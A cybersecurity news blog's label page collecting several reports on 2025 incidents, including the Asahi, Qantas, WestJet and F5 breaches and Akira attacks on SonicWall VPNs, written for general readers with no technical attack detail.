Search This Blog
Powered by Blogger.

Blog Archive

Labels

Footer About

Footer About

Labels

Load More
Trendy Right Now

Popular Posts

Showing posts with label Cyber Attacks. Show all posts
Ransomware
Artificial Intelligence China Cyber Attacks NCSC Ransomware

NCSC Warns of Rising Cyber Threats Linked to China, Urges Businesses to Build Defences

 



The United Kingdom’s National Cyber Security Centre (NCSC) has cautioned that hacking groups connected to China are responsible for an increasing number of cyberattacks targeting British organisations. Officials say the country has become one of the most capable and persistent sources of digital threats worldwide, with operations extending across government systems, private firms, and global institutions.

Paul Chichester, the NCSC’s Director of Operations, explained that certain nations, including China, are now using cyber intrusions as part of their broader national strategy to gain intelligence and influence. According to the NCSC’s latest annual report, China remains a “highly sophisticated” threat actor capable of conducting complex and coordinated attacks.

This warning coincides with a government initiative urging major UK companies to take stronger measures to secure their digital infrastructure. Ministers have written to hundreds of business leaders, asking them to review their cyber readiness and adopt more proactive protection strategies against ransomware, data theft, and state-sponsored attacks.

Last year, security agencies from the Five Eyes alliance, comprising the UK, the United States, Canada, Australia, and New Zealand uncovered a large-scale operation by a Chinese company that controlled a botnet of over 260,000 compromised devices. In August, officials again warned that Chinese-backed hackers were targeting telecommunications providers by exploiting vulnerabilities in routers and using infected devices to infiltrate additional networks.

The NCSC also noted that other nations, including Russia, are believed to be “pre-positioning” their cyber capabilities in critical sectors such as energy and transportation. Chichester emphasized that the war in Ukraine has demonstrated how cyber operations are now used as instruments of power, enabling states to disrupt essential services and advance strategic goals.


Artificial Intelligence: A New Tool for Attackers

The report highlights that artificial intelligence is increasingly being used by hostile actors to improve the speed and efficiency of existing attack techniques. The NCSC clarified that, while AI is not currently enabling entirely new forms of attacks, it allows adversaries to automate certain stages of hacking, such as identifying security flaws or crafting convincing phishing emails.

Ollie Whitehouse, the NCSC’s Chief Technology Officer, described AI as a “productivity enhancer” for cybercriminals. He explained that it is helping less experienced hackers conduct sophisticated campaigns and enabling organized groups to expand operations more rapidly. However, he reassured that AI does not currently pose an existential threat to national security.


Ransomware Remains the Most Severe Risk

For UK businesses, ransomware continues to be the most pressing danger. Criminals behind these attacks are financially motivated, often targeting organisations with weak security controls regardless of size or industry. The NCSC reports seeing daily incidents affecting schools, charities, and small enterprises struggling to recover from system lockouts and data loss.

To strengthen national resilience, the upcoming Cyber Security and Resilience Bill will require critical service providers, including data centres and managed service firms, to report cyber incidents within 24 hours. By increasing transparency and response speed, the government hopes to limit the impact of future attacks.

The NCSC urges business leaders to treat cyber risk as a priority at the executive level. Understanding the urgency of action, maintaining up-to-date systems, and investing in employee awareness are essential steps to prevent further damage. As cyber activity grows “more intense, frequent, and intricate,” the agency stresses that a united effort between the government and private sector is crucial to protecting the UK’s digital ecosystem.



Read more »
Identity Theft
Airline Customer Data Cyber Attacks cyberattacks on airline Data Breaches Data Leak data security Hackers Identity Theft

Qantas Data Leak Highlights Rising Airline Cyberattacks and Identity Theft Risks

 

Airlines continue to attract the attention of cybercriminals due to the vast amounts of personal data they collect, with passports and government IDs among the most valuable targets. According to privacy firm Incogni, the exposure of such documents poses a “severe, long-term identity theft risk” since they are difficult to replace and can be exploited for years in fraud schemes involving fake identities, counterfeit documents, and impersonation scams. 

The recent Qantas Airways data breach, claimed by the Scattered LAPSUS$ Hunters group, underscores the sector’s growing vulnerability. The stolen data included names, email addresses, Frequent Flyer details, and limited personal information such as phone numbers and birth dates. Fortunately, Qantas confirmed that no passport details, financial information, or credit card data were compromised. 

However, experts warn that even limited leaks can have serious consequences. “Attackers often combine personal identifiers like names and loyalty program details from multiple breaches to build complete identity profiles,” said Darius Belejevas, Head of Incogni. Such composite records can enable large-scale fraud even without financial data exposure. 

The Qantas incident also highlights the danger of third-party compromises. The breach reportedly stemmed from Salesforce social engineering and vendor vulnerabilities, illustrating how a single compromised supplier can have ripple effects across industries. Belejevas emphasized that “one compromised partner can expose millions of records in a single incident.” 

Data breaches in the airline industry are escalating rapidly. According to Cyble’s threat intelligence database, more than 20 airline-related breaches have been reported on the dark web in 2025 — a 50% increase from 2024. Much of this surge is attributed to coordinated attacks by Scattered Spider and the broader Scattered LAPSUS$ Hunters alliance, although other groups have also begun targeting the aviation sector. 

In a separate incident, the CL0P ransomware group claimed to have breached Envoy Air, a regional carrier of American Airlines. Envoy confirmed the intrusion but stated that no customer data was affected, only limited business information. In contrast, WestJet, which suffered a breach in June 2025, had passports and government-issued IDs exposed, prompting it to offer two years of free identity monitoring to affected customers. Incogni, however, warned that identity theft risks from such documents can persist well beyond two years. 

Experts urge travelers to take preventive security measures. Incogni recommends enrolling in identity theft monitoring, reporting phishing attempts to national anti-fraud agencies, using strong passwords with multi-factor authentication, and removing personal data from data broker sites. 

“Individuals and organizations must do more to safeguard sensitive data,” said Ron Zayas, CEO of Incogni. “In today’s world, data isn’t just being stolen by hackers — it’s also being misused by legitimate entities to manipulate outcomes.”
Read more »
Ransomware attack
Aviation System Collins Aerospace Cyber Attacks European Flights Ransomware attack

Hundreds of European Flights Disrupted by Major Ransomware Attack

 

A major ransomware attack recently caused widespread disruption to airline operations across several key European airports, resulting in hundreds of flight cancellations and delays for passengers. The incident highlights the growing vulnerability of the aviation industry due to its heavy reliance on technology, especially third-party software for critical services such as check-in and baggage handling.

The attack specifically targeted the popular MUSE check-in and boarding system, developed by US-based Collins Aerospace, a subsidiary of RTX. European cybersecurity agency ENISA confirmed on September 22 that ransomware had affected MUSE’s operations, forcing airports in Berlin, Brussels, and London Heathrow to revert to manual systems. 

The impact was severe: Brussels Airport canceled half of its Sunday and Monday flights, and Berlin Airport reported delays exceeding an hour due to nonfunctional check-in systems. At London Heathrow, Terminal 4 experienced significant disruption, with departures delayed by up to two hours and ongoing manual check-ins.

While Collins Aerospace claimed that manual processes could mitigate problems, the scale of the disruptions proved otherwise. Staff struggled to manage operations without technological support, underscoring the risks posed by dependence on software and the critical need for robust cybersecurity measures. Restoration of MUSE was nearly complete by Monday, yet some airports like Dublin experienced minimal disruption, showing varying impacts across different locations.

The broader risk is amplified by the fact that MUSE is used by over 300 airlines at 100 airports worldwide, raising concerns about the possibility of further attacks if vulnerabilities remain unaddressed. Experts caution that a compromised update could still threaten other airports, or that attackers may use initial breaches to extort further ransom from software providers.

This incident is part of a dramatic surge in cyberattacks facing the aviation sector, which saw a staggering 600% increase in 2025 compared to the previous year, according to French aerospace company Thales. Experts point out the economic and geopolitical stakes involved, advocating for a comprehensive cybersecurity strategy, adoption of AI tools, and industry-wide collaboration to address threats. 

The attack highlights that cyberattacks may have objectives beyond operational disruption, potentially targeting sensitive data and system integrity and emphasizing the urgent need for more resilient aviation security protocols.
Read more »
Nation-State Attacks
CISOs Cyber Attacks Cyber Awareness cyber resilience Cyber Threats Cybersecurity CyberWar Digital Defense Identity Security Nation-State Attacks

The Silent Guardians Powering the Frontlines of Cybersecurity

 


There is no doubt that a world increasingly defined by invisible battles and silent warriors has led to a shift from trenches to terminals on which modern warfare is now being waged. As a result, cyberwarfare is no longer a distant, abstract threat; now it is a tangible, relentless struggle with real-world consequences.

Power grids fail, hospitals go dark, and global markets tremble as a result of unseen attacks. It is at this point that a unique breed of defenders stands at the centre of this new conflict: cyber professionals who safeguard the fragile line between digital order and chaos. The official trailer for Semperis Midnight in the War Room, an upcoming documentary about the hidden costs of cyber conflict, has been released, bringing this hidden war to sharp focus. 

Semperis is a provider of AI-powered identity security and cyber resilience. It has an extraordinary lineup of voices – including Chris Inglis, the first U.S. National Cyber Director; General (Ret.) David Petraeus, the former Director of the CIA; Jen Easterly, former Director of the CISA; Marcus Hutchins, one of the WannaCry heroes; and Professor Mary Aiken, a globally recognised cyber psychologist – all of whom are highly respected for their expertise in cybersecurity. 

The film examines the high-stakes battle between attackers, defenders, and reformed hackers who have now taken the risk of exploiting for themselves. As part of this documentary, leading figures from the fields of cybersecurity and national defence gather together in order to present an unprecedented view of the digital battlefield. 

Using their insights into cyber conflicts, Midnight in the War Room explores the increasing threat that cybercrime poses to international relations as well as corporate survival today. A film that sheds light on the crucial role of chief information security officers (CISOs), which consists of who serve as the frontlines of protecting critical infrastructure - from power grids to financial networks - against state-sponsored and criminal cyber threats, is a must-see. 

It is the work of more than fifty international experts, including cyber journalists, intelligence veterans, and reformed hackers, who provide perspectives which demonstrate the ingenuity and exhaustion that those fighting constant digital attacks have in the face. Even though the biggest threat lies not only with the sophistication of adversaries but with complacency itself, Chris Inglis argues that global resilience is an urgent issue at the moment. 

It has been reported that Semperis' Chief Marketing Officer and Executive Producer, Thomas LeDuc, views the project as one of the first of its kind to capture the courage and pressure experienced by defenders. The film is richly enriched by contributions from Professor Mary Aiken, Heath Adams, Marene Allison, Kirsta Arndt, Grace Cassy and several former chief information security officers, such as Anne Coulombe and Simon Hodgkinson, and it provides a sweeping and deeply human perspective on modern cyber warfare. 

With its powerful narrative, Midnight in the War Room explores the human side of cyberwarfare—a struggle that is rarely acknowledged but is marked by courage, resilience and sacrifice in a way that is rarely depicted. A film about those defending the world's most vital systems is a look at the psychological and emotional toll they endure, in which trust is continually at risk and a moment of complacency can trigger devastating consequences. 

The film explores the psychological and emotional tolls endured by those defending those systems. During his remarks at Semperis, Vice President for Asia Pacific and Japan, Mr Sillars, points out that cyber threats do not recognise any borders, and the Asia Pacific region is at the forefront of this digital conflict as a result of cyber threats. 

During the presentation, he emphasises that the documentary seeks to highlight the common challenges cybersecurity professionals face worldwide, as well as to foster collaboration within critical sectors to build identity-driven resilience. As the Chief Marketing Officer at Semperis and Executive Producer, LeDuc describes the project as one of the most ambitious in cybersecurity history—bringing together top intelligence leaders, chief information security officers, journalists, victims and reformed hackers as part of a rare collaborative narrative.

In the film, Cyber Defenders' lives are portrayed through their own experiences as well as the relentless pressure and unwavering resolve they face every day. Among the prominent experts interviewed for the documentary are Marene Allison, former Chief Information Security Officer of Johnson & Johnson; Grace Cassy, co-founder of CyLon; Heather M. Costa, Director of Technology Resilience at the Mayo Clinic; Simon Hodgkinson, former Chief Information Security Officer of BHP; and David Schwed, former Chief Information Security Officer of Robinhood. 

Among those on the panel are Richard Staunton, Founder of IT-Harvest, BBC Cyber Correspondent Joe Tidy, as well as Jesse McGraw, a former hacktivist who has turned his expertise towards safeguarding the internet, known as Ghost Exodus. As Jen Easterly, former Chief Information Security Officer of the U.S. Department of Homeland Security (CISA), points out, defeating malicious cyberattacks requires more than advanced technology—it demands the human mind's ingenuity and curiosity to overcome them. 

A global collaboration was exemplified through the production of this documentary, which was filmed in North America and Europe by cybersecurity and professional organisations, including the CyberRisk Alliance, Cyber Future Foundation, Institute for Critical Infrastructure Technology, (ISC)2 Eastern Massachusetts Chapter, Michigan Council of Women in Technology, and Women in CyberSecurity (WiCyS) Delaware Valley Chapter. 

As part of these partnerships, private screenings, expert discussions, and public outreach will be conducted in order to increase public awareness and cooperation regarding building digital resilience. By providing an insight into the human narratives that underpin cybersecurity, Midnight in the War Room hopes to give a deeper understanding of the modern battlefield and to inspire a collective awareness in the safeguarding of society's systems. 

There is something special about Midnight in the War Room, both as a wake-up call and as a tribute - a cinematic reflection of those who stand up to the threats people face in today's digital age. The film focuses on cyber conflict and invites governments, organisations, and individuals to recognise the importance of cybersecurity not just as a technical problem, but as a responsibility that people all share. 

In light of the continuous evolution of threats, people need stronger international collaborations, investments in identity security, and the development of psychological resilience among those on the front lines to help combat these threats. Semperis' initiative illustrates the power of storytelling to bridge the gap between awareness and action, transforming technical discourse into a powerful narrative that inspires vigilance, empathy, and unity among the community.

Providing a critical insight into the human aspect behind the machines, Midnight in the War Room reinforces a fundamental truth: that is, cybersecurity is not just about defending data, but also about protecting the people, systems, and values that make modern society what it is today.
Read more »
leaked sensitive data
Asahi Beer Cyber Attacks Cyberattacks cybercriminal group CyberSecurity Ransomware Attacks Data Leak Data protection data security leaked sensitive data

Asahi Group Confirms Ransomware Attack Disrupting Operations and Leaking Data

 

Japanese food and beverage conglomerate Asahi Group Holdings has confirmed that a ransomware attack severely disrupted its operations and potentially exposed sensitive data, including employee and financial information. The cyberattack, which occurred on September 29, 2025, forced the company to delay releasing its January–September financial results, originally scheduled for November 12. 

The attack paralyzed Asahi’s domestic order and shipment systems, halting automated operations across Japan. Despite the disruption, the company implemented manual order processing and resumed partial shipments to ensure a continued supply of its popular beverages and food products. 

The Qilin ransomware group has claimed responsibility for the breach, asserting that it stole over 9,300 files containing personal and financial data. On October 8, Asahi confirmed that some of the stolen data was found online, prompting a detailed investigation into the scope and type of compromised information. In a public statement, the company said it is working to identify affected individuals and will issue notifications once the investigation confirms unauthorized data transfer.  

Although the incident primarily impacted systems within Japan, Asahi stated there is no evidence of compromise affecting its global operations. 

Recovery efforts are steadily progressing. Asahi Breweries resumed production at all six of its factories by October 2, restoring shipments of Asahi Super Dry, with other product lines following soon after. Asahi Soft Drinks restarted production at six of its seven plants by October 8, while Asahi Group Foods has also resumed partial operations at all seven domestic facilities.  

However, Asahi’s systems have not yet been fully restored, and the company has not provided a definite recovery timeline. The ongoing disruption has delayed access to critical accounting systems, forcing a postponement of quarterly financial reporting. 

In its official statement, Asahi explained that the financial disclosure delay is necessary to ensure accuracy and compliance amid system recovery. The company issued an apology to shareholders and stakeholders for the inconvenience caused and promised transparent updates as investigations and remediation progress. 

The Asahi Group cyberattack serves as another reminder of the rising frequency and impact of ransomware incidents targeting major corporations worldwide.
Read more »
Hacker attack
Breaches Critical Infrastructure critical infrastructure attack Cyber Attacks Cyberhackers data security F5 Security Hacker attack

Nation-State Hackers Breach F5 Networks, Exposing Thousands of Government and Corporate Systems to Imminent Threat

 

Thousands of networks operated by the U.S. government and Fortune 500 companies are facing an “imminent threat” of cyber intrusion after a major breach at Seattle-based software maker F5 Networks, the federal government warned on Wednesday. The company, known for its BIG-IP networking appliances, confirmed that a nation-state hacking group had infiltrated its systems in what it described as a “sophisticated, long-term intrusion.” 

According to F5, the attackers gained control of the network segment used to develop and distribute updates for its BIG-IP line—a critical infrastructure tool used by 48 of the world’s top 50 corporations. During their time inside F5’s systems, the hackers accessed proprietary source code, documentation of unpatched vulnerabilities, and customer configuration data. Such access provides attackers with an extraordinary understanding of the product’s architecture and weaknesses, raising serious concerns about potential supply-chain attacks targeting thousands of networks worldwide. 

Security analysts suggest that control of F5’s build environment could allow adversaries to manipulate software updates or exploit unpatched flaws within BIG-IP devices. These appliances often sit at the edge of networks, acting as load balancers, firewalls, and encryption gateways—meaning a compromise could provide a direct pathway into sensitive systems. The stolen configuration data also increases the likelihood that hackers could exploit credentials or internal settings for deeper infiltration. 

Despite the severity of the breach, F5 stated that investigations by multiple cybersecurity firms, including IOActive, NCC Group, Mandiant, and CrowdStrike, have not found evidence of tampering within its source code or build pipeline. The assessments further confirmed that no critical vulnerabilities were introduced and no customer or financial data was exfiltrated from F5’s internal systems. However, experts caution that the attackers’ deep access and stolen intelligence could still enable future targeted exploits. 

In response, F5 has issued updates for its BIG-IP, F5OS, BIG-IQ, and APM products and rotated its signing certificates to secure its software distribution process. The company has also provided a threat-hunting guide to assist customers in detecting potential compromise indicators. 

The U.S. Cybersecurity and Infrastructure Security Agency (CISA) has issued an emergency directive warning that the breach “poses an unacceptable risk” to federal networks. Agencies using F5 appliances have been ordered to inventory all affected devices, install the latest patches, and follow the company’s threat-hunting protocols. Similarly, the UK’s National Cyber Security Centre (NCSC) has released guidance urging organizations to update their systems immediately. 

While no supply-chain compromise has yet been confirmed, the breach of a vendor as deeply embedded in global enterprise networks as F5 underscores the growing risk of nation-state infiltration in critical infrastructure software. As investigations continue, security officials are urging both government and private organizations to take swift action to mitigate potential downstream threats.
Read more »
IT Industry
Automakers Automotive Industry Breaches Cyber Attacks Cyber Breaches Cyberattacks IT incident IT Industry

Automakers Face Surge in Cyberattacks as Jaguar Land Rover and Renault Recover from Major Breaches

 

Cybersecurity experts have warned that global automakers are likely to face an increasing wave of cyberattacks, as recent incidents continue to disrupt operations at leading manufacturers. The warning follows a series of high-profile breaches, including a major cyberattack on Jaguar Land Rover (JLR), which remains one of the most significant security incidents to hit the automotive industry in recent years. 

Jaguar Land Rover suffered a severe cyberattack at the end of August, forcing the company to shut down its IT systems and suspend production across multiple facilities. The disruption caused widespread operational chaos, but JLR recently confirmed it has begun a phased restart of production at its Electric Propulsion Manufacturing Centre (EPMC) and Battery Assembly Centre (BAC) in the West Midlands. The automaker plans to expand the restart to other key sites, including Castle Bromwich, Halewood, Solihull, and its manufacturing facility in Nitra, Slovakia. 

JLR CEO Adrian Mardell expressed gratitude to employees for their efforts during the recovery, stating, "We know there is much more to do, but our recovery is firmly underway." However, the company remains cautious as it works to fully restore systems and strengthen security controls. 

French automaker Renault also confirmed that one of its third-party data processing providers had been targeted in a separate cyberattack, compromising customer information such as names, addresses, dates of birth, gender, phone numbers, vehicle registration details, and VIN numbers. While Renault clarified that no financial or password data was accessed, the company has begun notifying affected customers and advising them to be wary of phishing attempts or fraudulent communications.  
Ignas Valancius, head of engineering at cybersecurity firm NordPass, warned that cybercriminals often exploit such incidents to impersonate company representatives, lawyers, or even law enforcement to extract additional personal or financial data. He emphasized the growing sophistication of social engineering attacks, noting that scammers may pose as attorneys offering to help victims claim compensation, only to defraud them further. 

The automotive sector's vulnerability has become increasingly evident in 2025, with luxury manufacturers frequently targeted by ransomware and data theft operations. In addition to JLR and Renault, other global brands have reported breaches. 

Meanwhile, Swedish HR software provider Miljödata suffered a breach that compromised the personal information of Volvo North America employees, and Stellantis confirmed unauthorized access to its customer contact database via a third-party provider. Valancius highlighted that cybercriminals appear to be deliberately targeting luxury brands, seeking to exploit their association with high-net-worth clientele. "It seems that luxury brands have been prime targets for hacker groups in 2025," he said, adding that these incidents could lead to more sophisticated spear-phishing campaigns and targeted extortion attempts. 

As automakers increasingly rely on digital systems, connected vehicles, and cloud-based infrastructure, experts stress that robust cybersecurity measures and third-party risk management are now essential to safeguard both company data and customer privacy. The recent breaches serve as a stark reminder that the automotive industry's digital transformation has also made it a lucrative target for global cybercriminal networks.
Read more »
Salesforce
BreachForums Cyber Attacks Data Leak FBI LAPSUS$ Salesforce

BreachForums Taken Down by FBI and French Authorities as LAPSUS$-Linked Group Threatens Salesforce Data Leak

 



U.S. and French law enforcement agencies have seized the latest version of BreachForums, a cybercrime platform known for hosting stolen databases and leaked information. The takedown was carried out by the Federal Bureau of Investigation (FBI), the U.S. Department of Justice, and French cybercrime authorities, who placed an official seizure notice on the site on October 9.

This development comes just hours before an extortion deadline announced by a threat group calling itself Scattered LAPSUS$ Hunters, which had threatened to leak data allegedly stolen from Salesforce and Salesloft if ransom demands were not met by October 10.

The seizure was first noticed on Telegram before it became official. A threat actor using the alias “emo” had observed that BreachForums’ domain was using Cloudflare name servers associated with previously seized FBI sites, suggesting law enforcement action was imminent.

Following the seizure, Scattered LAPSUS$ Hunters confirmed the action on its Telegram channel through a PGP-signed message, claiming that all their BreachForums-related domains and backend infrastructure were taken offline and destroyed. The group, however, asserted that its members had not been arrested and that their Tor-based data leak site remained active.

“The era of forums is over,” the message read, warning members to maintain operational security and avoid new BreachForums clones, which the group claimed could be “honeypots” operated by law enforcement.


Compromised Infrastructure and Data

The group stated that during the seizure, all BreachForums database backups dating from 2023 to the present were compromised, along with escrow and server systems. They also alleged that their onion hidden service was affected because the underlying infrastructure had been seized and destroyed.

Despite this, Scattered LAPSUS$ Hunters insisted that the takedown would not affect their planned Salesforce data leak campaign. The group reiterated that the October 10 deadline for victims to comply with their ransom demands remained unchanged.

This marks the fourth major seizure in the history of BreachForums and its predecessors, including the earlier RaidForums. Both forums have been repeatedly targeted by global law enforcement operations and linked to several high-profile arrests over the years.

The group also revealed that the widely known administrator “pompompurin,” believed to have launched BreachForums after RaidForums’ closure, had merely been a “front,” suggesting that the forum’s operations were coordinated by a wider network of individuals from the start.


What Lies Ahead

While the seizure has temporarily disrupted the group’s clearnet operations, cyber experts caution that criminal forums often migrate to the dark web or encrypted channels to continue their activities. Authorities are expected to pursue further investigations in the coming weeks to identify and apprehend those involved.

For cybersecurity professionals and enterprises, it's high time to give importance to monitoring data exposure risks and staying alert to potential secondary leaks, especially when extortion groups remain active through alternate platforms.



Read more »
Ransomware attack
Asahi Beer Cyber Attacks Japanese Firm Qilin Ransomware attack

Asahi Beer Giant Hit by Cyberattack, Forced to Manual Operations

 

Japanese brewing giant Asahi Group Holdings, the manufacturer of Japan's most popular beer Super Dry, suffered a devastating ransomware attack in late September 2025 that forced the company to revert to manual operations using pen, paper, and fax machines. The cyberattack was first disclosed on September 29, when the company announced a system failure that disrupted ordering, shipping, and customer service operations across its 30 domestic breweries in Japan.

The ransomware incident, later claimed by the Qilin hacking group, forced Asahi to temporarily shut down nearly all its Japanese production facilities. The attack crippled the company's online systems, leaving vendors and business owners without access to information as call centers and customer service desks were closed. Asahi was forced to process orders manually using traditional paper-based methods and fax machines to prevent potential beverage shortages across the country.

Initial investigations revealed traces suggesting potential unauthorized data transfer, and the company later confirmed on October 14 that personal information may have been compromised. The Qilin ransomware gang claimed responsibility for the breach, alleging they stole approximately 27 gigabytes of data containing financial documents, budgets, contracts, employee personal information, and company development forecasts. Samples of allegedly stolen data included employee ID cards and other personal documents.

The cyberattack had widespread operational consequences beyond production disruptions. Asahi postponed its quarterly financial results for the third quarter of fiscal year 2025 because the incident disrupted access to accounting-related data and delayed financial closing procedures. Recovery efforts involved collaboration between Asahi's Emergency Response Headquarters, cybersecurity specialists, and Japanese cybercrime authorities.

While all breweries have partially resumed operations and restarted production, computer systems remain non-operational with no clear timeline for full recovery. The company has committed to promptly notifying affected individuals and implementing appropriate measures in accordance with personal data protection laws. This incident highlights Japan's vulnerability to ransomware attacks, as Japanese companies often have weaker cybersecurity defenses compared to other nations and are more likely to pay ransom demands.
Read more »
data security
Cyber Attacks cybercriminal group CyberSecurity Ransomware Attacks dark web data leak Data Leak data security

Qilin Ransomware Gang Claims Cyberattack on Japanese Beer Giant Asahi

 

The Qilin ransomware group has claimed responsibility for the recent cyberattack on Japanese brewing giant Asahi, adding the company’s name to its dark web data leak site. The cybercriminals alleged that they had stolen over 9,300 files amounting to 27GB of confidential data, including financial documents, employee identification records, contracts, and internal reports. To substantiate their claims, the group published 29 images showing snippets of the stolen files. 

Asahi, Japan’s largest beer manufacturer, employs around 30,000 people and produces approximately 100 million hectoliters annually, generating close to $20 billion in revenue. The company suffered significant operational disruptions following the attack. On September 29, Asahi temporarily halted production at six of its domestic facilities, later confirming on October 3 that a ransomware attack had crippled its systems and led to data exfiltration. 

At first, no threat actor took public credit for the breach. However, the Qilin ransomware group eventually listed Asahi among its victims, likely after ransom negotiations failed. Qilin, which emerged in 2023, is known as a multi-platform ransomware operation capable of targeting both Windows and Linux systems. The group has been associated with other notorious hacker collectives such as Scattered Spider and, more recently, North Korean state-linked actors. 

Qilin’s tactics include exploiting vulnerabilities in edge network devices, deploying credential theft tools, and developing sophisticated encryption mechanisms to hinder recovery. The group has previously targeted high-profile organizations including Nissan, Inotiv, Lee Enterprises, major hospitals within London’s NHS network, and automotive supplier Yangfeng.

In its post, Qilin claimed that the Asahi ransomware attack could result in losses exceeding $335 million due to production halts affecting six breweries and more than thirty beer labels. Despite the claims, Asahi has not verified the authenticity of the leaked files. In a statement to BleepingComputer, a company spokesperson confirmed that the matter remains under active investigation and declined to comment further. 

The company also shared that production of its flagship beer, Super Dry, has resumed through a temporary manual ordering system. While Asahi’s factories are not yet operating at full capacity, shipments for additional labels are expected to restart by October 15. However, as a direct consequence of the cyberattack and ongoing disruptions, Asahi announced it would delay the launch of new products that were initially planned for October 2025. 

The attack on Asahi underscores the growing reach and sophistication of ransomware groups like Qilin, whose increasingly destructive campaigns continue to target global corporations across industries, threatening both economic stability and consumer trust.
Read more »
Ransomware attack
Australia Cyber Attacks pharma scam Ransomware attack

Toowoomba Pharmacy Targeted in Ransomware Attack

A pharmacy in Toowoomba, Queensland, has become the latest victim of a ransomware attack, highlighting growing concerns about the digital vulnerability of small businesses. 

The incident occurred last month when hackers gained access to the Friendlies Society Dispensary’s private IT systems. Authorities believe sensitive data stored on the system may have been compromised. 

A coordinated investigation is now underway, involving the National Office of Cyber Security, the Australian Cyber Security Centre, Services Australia, Queensland Health, the National Disability Insurance Agency, and the Department of Home Affairs. 

Bayden Johnson, Chief Executive Officer of the Friendlies Society Dispensary, said the organisation acted quickly once the attack was detected. “We immediately took steps to secure our systems and understand the nature of the incident,” he said. “Our priority now is to determine what information was accessed and ensure all necessary precautions are taken.” 

The pharmacy, which offers healthcare services and mobility support equipment, is cooperating fully with federal authorities. The Department of Home Affairs stated that Services Australia’s systems remain secure and were not affected by the breach. It added that ongoing monitoring is being carried out to detect any irregular activity. 

According to the Australian Signals Directorate (ASD), ransomware incidents account for 11 percent of all reported cyberattacks in the country. 

The ASD’s 2023–24 Annual Cyber Threat Report revealed that a cybercrime report is lodged roughly every six minutes, with small businesses reporting an average loss of $49,600 per attack. 

Associate Professor Saeed Akhlaghpour from the University of Queensland’s Cyber Research Centre said cybercriminals are constantly evolving their tactics. “Attackers are no longer just locking files; they are also stealing and leaking data. Ransomware can even be delivered through browsers, apps, or malicious file uploads,” he explained. 

Dr Akhlaghpour, who researches cybersecurity risks in the healthcare sector, said health organisations such as pharmacies, medical practices, and gyms often face higher risks due to inconsistent monitoring and handling of sensitive information. 

He noted that human error is still the leading cause of ransomware attacks, as employees often reuse passwords or click on unsafe links in haste. With the rise of AI-powered tools that make it easier for criminals to conduct large-scale attacks, he urged small business owners to invest in better cybersecurity systems and response plans. 

“Many breaches occur because of poor risk management and the absence of a clear response strategy,” he said. “Regular monitoring can prevent many of these problems.” 

Dr Akhlaghpour also advised businesses not to pay ransoms if they fall victim to an attack. “You cannot trust criminals. Paying the ransom rarely restores data and often leads to further targeting. Stolen data is frequently resold on the dark web,” he warned. 

Authorities continue to monitor the situation in Toowoomba as cybersecurity experts remind small business owners across Australia to take preventive measures and strengthen their defences against the growing threat of ransomware.
Read more »
personal data leak
Customer Data Cyber Attacks Data Breaches Data Leak Data protection data security Personal Data personal data leak

WestJet Confirms Cyberattack Exposed Passenger Data but No Financial Details

 

WestJet has confirmed that a cyberattack in June compromised certain passenger information, though the airline maintains that the breach did not involve sensitive financial or password data. The incident, which took place on June 13, was attributed to a “sophisticated, criminal third party,” according to a notice issued by the airline to U.S. residents earlier this week. 

WestJet stated that its internal precautionary measures successfully prevented the attackers from gaining access to credit and debit card details, including card numbers, expiry dates, and CVV codes. The airline further confirmed that no user passwords were stolen. However, the company acknowledged that some passengers’ personal information had been exposed. The compromised data included names, contact details, information and documents related to reservations and travel, and details regarding the passengers’ relationship with WestJet. 

“Containment is complete, and additional system and data security measures have been implemented,” WestJet said in an official release. The airline emphasized that analysis of the incident is still ongoing and that it continues to strengthen its cybersecurity framework to safeguard customer data. 

As part of its response plan, WestJet is contacting affected customers to offer support and guidance. The airline has partnered with Cyberscout, a company specializing in identity theft protection and fraud assistance, to help impacted individuals with remediation services. WestJet has also published advisory information on its website to assist passengers who may be concerned about their data.  

In its statement, the airline reassured customers that swift containment measures limited the breach’s impact. “Our cybersecurity teams acted immediately to contain the situation and secure our systems. We take our responsibility to protect customer information very seriously,” the company said. 

WestJet confirmed that it is working closely with law enforcement agencies, including the U.S. Federal Bureau of Investigation (FBI) and the Canadian Centre for Cyber Security. The airline also notified U.S. credit reporting agencies—TransUnion, Experian, and Equifax—along with the attorneys general of several U.S. states, Transport Canada, the Office of the Privacy Commissioner of Canada, and relevant provincial and international data protection authorities. 

While WestJet maintains that the exposed information does not appear to include sensitive financial or authentication details, cybersecurity experts note that personal identifiers such as names and contact data can still pose privacy and fraud risks if misused. The airline’s transparency and engagement with regulatory agencies reflect an effort to mitigate potential harm and restore public trust. 

The company reiterated that it remains committed to improving its security posture through enhanced monitoring, employee training, and the implementation of additional cybersecurity controls. The investigation into the breach continues, and WestJet has promised to provide further updates as new information becomes available. 

The incident highlights the ongoing threat of cyberattacks against the aviation industry, where companies hold large volumes of personal and travel-related data. Despite the rise in security investments, even well-established airlines remain attractive targets for sophisticated cybercriminals. WestJet’s quick response and cooperation with authorities underscore the importance of rapid containment and transparency in handling such data breaches.
Read more »
cybersecurity research
Akira Akira Ransomware Arctic Wolf Arctic Wolf security research CVE CVEs Cyber Attacks Cyber Security Ransomware Attacks cybersecurity research

Akira Ransomware Bypasses MFA in Ongoing Attacks on SonicWall SSL VPN Devices

 

The Akira ransomware group continues to evolve its attacks on SonicWall SSL VPN devices, with researchers warning that the threat actors are managing to log into accounts even when one-time password (OTP) multi-factor authentication (MFA) is enabled. Cybersecurity firm Arctic Wolf reported that attackers appear to be exploiting previously stolen OTP seeds or a similar method to bypass MFA, though the exact technique remains unclear. 

Earlier this year, Akira was observed exploiting SonicWall SSL VPN devices to breach corporate networks. Initially, researchers suspected a zero-day vulnerability was involved. However, SonicWall later attributed the incidents to an improper access control flaw identified as CVE-2024-40766, disclosed in September 2024. The flaw had been patched in August 2024, but attackers continued to exploit stolen credentials from compromised devices even after updates were applied. SonicWall advised administrators to reset all VPN credentials and update to the latest SonicOS firmware.  

The latest Arctic Wolf findings reveal a persistent campaign in which multiple OTP challenges were triggered before successful logins, implying that attackers may be generating valid OTP tokens using previously harvested OTP seeds. The company confirmed that these logins were linked to devices affected by CVE-2024-40766, suggesting that stolen credentials remain a key entry point.

In a related investigation, Google’s Threat Intelligence Group (GTIG) observed a similar campaign in July, where a financially motivated group known as UNC6148 deployed the OVERSTEP rootkit on SonicWall SMA 100 series appliances. GTIG assessed that the attackers were using stolen one-time password seeds from earlier zero-day intrusions, allowing continued access even after organizations patched their systems. 

